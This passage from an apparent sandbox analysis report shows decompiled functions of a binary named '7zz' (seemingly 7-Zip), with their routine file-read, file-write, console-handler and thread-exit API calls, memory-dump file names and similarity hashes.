					_t47 = _t17;
					if(_t17 == 0) {
						E0040B521(_t41 - 0x54);
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						_push(__edx);
						_t19 = E0040B0A0(_t41 - 0x1c, _t36);
						 *(_t41 - 4) = 1;
						_t20 = E0040B431(_t41 - 0x54, _t36, _t47,  *_t19); // executed
						 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
						 *((char*)(_t41 - 0xd)) = _t20;
						E00407A18( *((intOrPtr*)(_t41 - 0x1c)));
						if( *((char*)(_t41 - 0xd)) != 0) {
							E00401E26(__edx, _t41 - 0x2c);
						}
						_t17 = E00407A18( *((intOrPtr*)(_t41 - 0x2c)));
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t41 - 0xc));
				return _t17;
			}

0x00411199
0x004111a5
0x004111ab
0x004111af
0x004111b4
0x004111b6
0x004111bb
0x004111c0
0x004111c4
0x004111ca
0x004111d4
0x004111d8
0x004111dd
0x004111e1
0x004111e7
0x004111f1
0x004111f9
0x004111f9
0x00411201
0x00411206
0x004111b6
0x0041120c
0x00411214

APIs

__EH_prolog.LIBCMT ref: 00411199

Part of subcall function 0040B0A0: __EH_prolog.LIBCMT ref: 0040B0A5

Part of subcall function 0040B431: __EH_prolog.LIBCMT ref: 0040B436

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
Instruction ID: 608382dd46c2c598823991ebebde0f7aed9941af7d6df7122e602381931aeda8
Opcode Fuzzy Hash: 3f2aa2f0a0685f544a815ae2bafa434bc2f73450f177d8b353e65cf44b4f0f47
Instruction Fuzzy Hash: 0E019E31E00258AACF15E7A9D4017EEB7B89F85358F14C0AFE411B32D2CB7C1A08C799

Uniqueness

Uniqueness Score: -1.00%

Function 0040C914 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040C914(intOrPtr __ecx, void* __edx, void* __eflags) {
				void* _t17;
				signed int _t18;
				void* _t28;
				void* _t30;

				E0046B890(E00473E64, _t30);
				_push(__ecx);
				 *(_t30 - 0x10) =  *(_t30 - 0x10) & 0x00000000;
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				_t17 = E0040C83C(_t30 - 0x10, __ecx,  *((intOrPtr*)(_t30 + 8)),  *((intOrPtr*)(_t30 + 0xc)), __edx,  *((intOrPtr*)(_t30 + 0x10)), 1); // executed
				 *(_t30 - 4) =  *(_t30 - 4) | 0xffffffff;
				_t28 = _t17;
				_t18 =  *(_t30 - 0x10);
				if(_t18 != 0) {
					 *((intOrPtr*)( *_t18 + 8))(_t18);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return _t28;
			}

0x0040c919
0x0040c91e
0x0040c91f
0x0040c928
0x0040c93b
0x0040c940
0x0040c944
0x0040c946
0x0040c94b
0x0040c950
0x0040c950
0x0040c959
0x0040c961

APIs

__EH_prolog.LIBCMT ref: 0040C919

Part of subcall function 0040C83C: __EH_prolog.LIBCMT ref: 0040C841

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
Instruction ID: 5a94585eceb8510585562d7b83d4e929578e69876529fb1f756434af7c7637c0
Opcode Fuzzy Hash: 99378acdd3581c8dad4e7dff9413259cddc864b686160a7ef6cc3208cd7c5292
Instruction Fuzzy Hash: 9AF05E72A00219EFDB14EF98CC01BEEB779FB44355F10826AB425E7290C7789E00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00405C72 Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405C72(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t14;
				void* _t17;
				void* _t22;
				void* _t24;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t32;

				_t32 = __eflags;
				E0046B890(E004734B8, _t27);
				_push(_t17);
				_push(_t24);
				 *0x490a80 = 0x490ab8;
				 *((intOrPtr*)(_t27 - 0x10)) = _t29 - 0x30;
				 *0x490a7c = E00405F22();
				E004018A2(_t27 - 0x14);
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				 *(_t27 - 4) = 1;
				_t14 = E00403A70(_t17, _t22, _t24, _t32, _t22); // executed
				_t25 = _t14;
				 *(_t27 - 4) =  *(_t27 - 4) | 0xffffffff;
				E00401917(_t27 - 0x14); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t25;
			}

0x00405c72
0x00405c77
0x00405c7f
0x00405c80
0x00405c82
0x00405c8c
0x00405c97
0x00405c9c
0x00405ca1
0x00405ca5
0x00405ca9
0x00405cae
0x00405f05
0x00405f0c
0x00405f18
0x00405f21

APIs

__EH_prolog.LIBCMT ref: 00405C77

Part of subcall function 00405F22: GetVersionExA.KERNEL32(?), ref: 00405F3C

Part of subcall function 004018A2: SetConsoleCtrlHandler.KERNEL32(004018DA,00000001,?,?,?,00405CA1), ref: 004018B6

Part of subcall function 00403A70: __EH_prolog.LIBCMT ref: 00403A75
Part of subcall function 00403A70: SetFileApisToOEM.KERNEL32 ref: 00403A83
Part of subcall function 00403A70: GetCommandLineW.KERNEL32 ref: 00403A9E

Part of subcall function 00401917: SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ConsoleCtrlH_prologHandler$ApisCommandFileLineVersion
String ID:
API String ID: 3811785086-0
Opcode ID: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
Instruction ID: fcab1c6799a526d6cc84579c245541fcc004ed5d2a27ee256b075ce021a0ee51
Opcode Fuzzy Hash: e9cb7d4847eacb32bd0261b85e1eabd0854b54bd825164040ec013db58bdf870
Instruction Fuzzy Hash: 9FF0BE72D002459ECB04EBAA980269EBB74EB60368F10857FE412732D1D77C0B04CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040BD9F Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0040BD9F(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x48b5b0; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}

0x0040bd9f
0x0040bda2
0x0040bda3
0x0040bdab
0x0040bdad
0x0040bdad
0x0040bdb6
0x0040bdc2
0x0040bdd0
0x0040bdd6

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 0040BDC2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
Instruction ID: f5b03d0275e53328e8766596d7aa07537ccbbd1802995bf3e8a2da8ce39c38f6
Opcode Fuzzy Hash: 293fb559e6840d76b7e7019225d963716ccc77cfe30249145607202f06dff26f
Instruction Fuzzy Hash: 84E0C275600208FBCB01CF95C841B8E7BB9EB48354F20C069F919AA2A0D739AA50DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0046CE2E Relevance: 1.5, APIs: 1, Instructions: 20
threadCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0046CE2E() {
				intOrPtr* _t5;
				void* _t14;
				intOrPtr _t15;

				_t15 =  *((intOrPtr*)(_t14 - 0x18));
				E0046E706( *((intOrPtr*)(_t14 - 0x20)));
				_t5 =  *0x4965a4; // 0x0
				if(_t5 != 0) {
					 *_t5();
				}
				_t13 = E0046E383();
				if(_t6 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t13);
				ExitThread( *(_t15 + 8));
			}

0x0046ce2e
0x0046ce34
0x0046ce39
0x0046ce40
0x0046ce42
0x0046ce42
0x0046ce4a
0x0046ce4e
0x0046ce52
0x0046ce57
0x0046ce59
0x0046ce63

APIs

ExitThread.KERNEL32 ref: 0046CE63

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
Instruction ID: 64bb69de8ff6d42c3457098edc656902f5609d49139222b7e3e69db672cf67b2
Opcode Fuzzy Hash: c5135cbf11f344371f6cf3902ba34674a06b3dda85637e8f4185bdea1e723400
Instruction Fuzzy Hash: 4CE086319001115FDB2127A2DC0A66F3670AF00354F01002BF8405A260FB598C91469F

Uniqueness

Uniqueness Score: -1.00%

Function 0042F024 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042F024(intOrPtr* __ecx, void* __eflags) {
				void* _t10;
				void* _t19;
				intOrPtr _t21;

				E0046B890(E004776A4, _t19);
				_push(__ecx);
				 *(_t19 - 4) =  *(_t19 - 4) & 0x00000000;
				 *((intOrPtr*)(_t19 - 0x10)) = _t21;
				_t10 = E0042EC5C(__ecx, __eflags,  *((intOrPtr*)(_t19 + 8)),  *((intOrPtr*)(_t19 + 0xc)),  *((intOrPtr*)(_t19 + 0x10))); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t19 - 0xc));
				return _t10;
			}

0x0042f029
0x0042f02e
0x0042f032
0x0042f036
0x0042f042
0x0042f057
0x0042f060

APIs

__EH_prolog.LIBCMT ref: 0042F029

Part of subcall function 0042EC5C: __EH_prolog.LIBCMT ref: 0042EC61

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
Instruction ID: f263eec74e2fdc413f8ce8191d7481965beeba368c6f144b2a49cdf0410d163b
Opcode Fuzzy Hash: 89d83f9e4c00c039be1d184f45ea62dd8a41aa49ca7f469a3101ba73a4b22e09
Instruction Fuzzy Hash: 56E04632A00118FBCB01AF8AD801BEE7B38FB453A4F00842BF01556001C3BA99109AA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC58 Relevance: 1.5, APIs: 1, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0040BC58(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}

0x0040bc5b
0x0040bc62
0x0040bc6e
0x0040bc7c
0x0040bc82

APIs

ReadFile.KERNELBASE(000000FF,?,?,?,00000000,000000FF,?,0040BCA3,?,?,00000000,?,0040BCC9,?,?,00000002), ref: 0040BC6E

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
Instruction ID: e80a47eef93cbac88b9d1de4091ab22be8c7773048f98afb7b75ce3e7b1ffdc8
Opcode Fuzzy Hash: 119bd35a6ca8e8dfe3fd58043442ef1f0f2720401cd9468696989d7f5503d79e
Instruction Fuzzy Hash: DEE0EC75200208FBDB01CF90CC01F8E7BB9FB49754F208058E90596160C375AA64EB54

Uniqueness

Uniqueness Score: -1.00%

Function 0046CE39 Relevance: 1.5, APIs: 1, Instructions: 17
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0046CE39(long _a4) {
				intOrPtr* _t2;

				_t2 =  *0x4965a4; // 0x0
				if(_t2 != 0) {
					 *_t2();
				}
				_t10 = E0046E383();
				if(_t3 == 0) {
					E0046D03C(0x10);
				}
				E0046E3EA(_t10);
				ExitThread(_a4);
			}

0x0046ce39
0x0046ce40
0x0046ce42
0x0046ce42
0x0046ce4a
0x0046ce4e
0x0046ce52
0x0046ce57
0x0046ce59
0x0046ce63

APIs

ExitThread.KERNEL32 ref: 0046CE63

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
Instruction ID: a94cd4d5187b38e27ba911a5e394843a57b7ffb4073ce8cb43cd479127d45c81
Opcode Fuzzy Hash: a8c2bd8bc36288136cb985c6ef66aa088bd3311e3ca7684abd4a46ab8bba787c
Instruction Fuzzy Hash: E5D05E31A416226EE6322762DC4AA2F22A49F00754B01002FF8848A260FF598C81419F

Uniqueness

Uniqueness Score: -1.00%

Function 0043394A Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0043394A(void* __ecx) {
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t12;

				E0046B890(E00477BAA, _t12);
				_push(__ecx);
				_push(0x270);
				_t10 = E004079F2();
				 *((intOrPtr*)(_t12 - 0x10)) = _t10;
				_t7 = 0;
				_t15 = _t10;
				 *((intOrPtr*)(_t12 - 4)) = 0;
				if(_t10 != 0) {
					_t7 = E0042A3CD(_t10, _t15); // executed
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0xc));
				return _t7;
			}

0x0043394f
0x00433954
0x00433955
0x00433960
0x00433962
0x00433965
0x00433967
0x00433969
0x0043396c
0x0043396e
0x0043396e
0x00433976
0x0043397e

APIs

__EH_prolog.LIBCMT ref: 0043394F

Part of subcall function 0042A3CD: __EH_prolog.LIBCMT ref: 0042A3D2

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 49664c6f3ba43aa1f642359bb80e799efb126460c9142e8bc53b2b48cf8044a7
Instruction ID: 784fa2737f9a3aecb95f3671ac57fc4e3df94eaba76e5e114e4ffca640bbc759
Opcode Fuzzy Hash: 49664c6f3ba43aa1f642359bb80e799efb126460c9142e8bc53b2b48cf8044a7
Instruction Fuzzy Hash: 80D017B1A442159BDB08FBA8944236D72A1AB08308F10857FA41AE3780EB785900866A

Uniqueness

Uniqueness Score: -1.00%

Function 00401917 Relevance: 1.5, APIs: 1, Instructions: 16
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E00401917(intOrPtr* __ecx) {
				char* _v8;
				int _t3;

				_push(__ecx);
				 *__ecx = 0x47a258; // executed
				_t3 = SetConsoleCtrlHandler(E004018DA, 0); // executed
				if(_t3 == 0) {
					_v8 = "SetConsoleCtrlHandler fails";
					return E0046B8F4( &_v8, 0x47cf70);
				}
				return _t3;
			}

0x0040191a
0x00401922
0x00401928
0x00401930
0x0040193b
0x00000000
0x00401942
0x00401948

APIs

SetConsoleCtrlHandler.KERNELBASE(004018DA,00000000,?,?,00405F11), ref: 00401928

Part of subcall function 0046B8F4: RaiseException.KERNEL32(0047CF70,?,00405CA1,?,?,?,0047CF70,?,?,?,00405CA1), ref: 0046B922

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: ConsoleCtrlExceptionHandlerRaise
String ID:
API String ID: 118816144-0
Opcode ID: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
Instruction ID: 6ced6f053643f7caf5f562c5cf66968f1a01d4a1bbfb89d95e4470d53f11f31c
Opcode Fuzzy Hash: 7d417b143ea1433f04c1f19a4f714dece2fd5a2579662ce84d2d8607feb3290c
Instruction Fuzzy Hash: 21D05BB024030876D710EF958D06B4D369CDB81748F20809BE104B22D1E7F9A500571E

Uniqueness

Uniqueness Score: -1.00%

Function 0040B154 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B154(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x0040b155
0x0040b157
0x0040b15c
0x0040b170
0x0040b173
0x0040b15e
0x0040b15f
0x0040b167
0x0040b16d
0x00000000
0x0040b169
0x0040b16c
0x0040b16c
0x0040b167

APIs

FindClose.KERNELBASE(00000000,?,0040B18C), ref: 0040B15F

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
Instruction ID: b21785a81a83a5848f3eefaff4503489f3c43cb4ff3f3a84b902145481c2820f
Opcode Fuzzy Hash: 44b45b29d53ae0ee441c7631a48af92bc4367c4c071d9c8d09f5d2f54756129b
Instruction Fuzzy Hash: 14D0123110426186CA641E3C78589C733D89A463B03214B6AF4B4D72E1D3749CD356EC

Uniqueness

Uniqueness Score: -1.00%

Function 0040B9C0 Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B9C0(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x0040b9c1
0x0040b9c3
0x0040b9c8
0x0040b9dc
0x0040b9df
0x0040b9ca
0x0040b9cb
0x0040b9d3
0x0040b9d9
0x00000000
0x0040b9d5
0x0040b9d8
0x0040b9d8
0x0040b9d3

APIs

FindCloseChangeNotification.KERNELBASE(00000000,?,0040B938,000000FF,00000000,00000080,0040BC55,?,00000000,0040B46E,?,59@), ref: 0040B9CB

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
